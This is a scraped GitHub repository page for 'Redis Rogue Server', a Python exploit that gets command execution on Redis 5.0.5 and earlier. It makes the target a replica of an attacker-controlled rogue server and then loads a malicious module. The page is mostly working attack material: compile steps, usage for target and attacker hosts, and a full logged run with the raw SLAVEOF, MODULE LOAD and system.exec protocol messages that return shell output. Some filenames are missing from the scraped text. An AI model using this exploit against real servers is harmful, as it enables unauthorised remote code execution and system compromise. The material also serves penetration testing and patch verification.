Skip to content
利用redis 4.x/5.x master/slave 模式getshell
Branch: master
Clone or download
Latest commit f5ed472 Jul 11, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
RedisModulesSDK initial Jul 11, 2019
.gitignore initial Jul 11, 2019
1.png update manual Jul 11, 2019
LICENSE initial Jul 11, 2019 update manual Jul 11, 2019 update manual Jul 11, 2019

Redis Rogue Server

Forking and refactoring from

A exploit for Redis(<=5.0.5) RCE, inspired by Redis post-exploitation.


Python 3.x


Compile exploit:

cd RedisModulesSDK/exp/

Then, is in RedisModulesSDK/


➜ python -h

usage: [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
                       [-c COMMAND] [-a AUTH] [-v]

Redis 4.x/5.x RCE with RedisModules

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        target host
  -p RPORT, --rport RPORT
                        target redis port, default 6379
  -L LHOST, --lhost LHOST
                        rogue server ip
  -P LPORT, --lport LPORT
                        rogue server listen port, default 21000
  -f FILE, --file FILE  RedisModules to load, default
  -c COMMAND, --command COMMAND
                        Command that you want to execute
  -a AUTH, --auth AUTH  redis password

Execute command:

➜ python -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/ -c "id"

>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$13\r\n*.*.*.*\r\n$4\r\n8888\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'PING\r\n'
>> receive data: b'REPLCONF listening-port 6379\r\n'
>> receive data: b'REPLCONF capa eof capa psync2\r\n'
>> receive data: b'PSYNC 7cce9210b3ad3f54043ce1965cda506bd26b0224 1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n'
>> receive data: b'$49\r\n\x08uid=999(redis) gid=999(redis) groups=999(redis)\n\r\n'
uid=999(redis) gid=999(redis) groups=999(redis)

>> send data: b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
>> receive data: b'+OK\r\n'



You can’t perform that action at this time.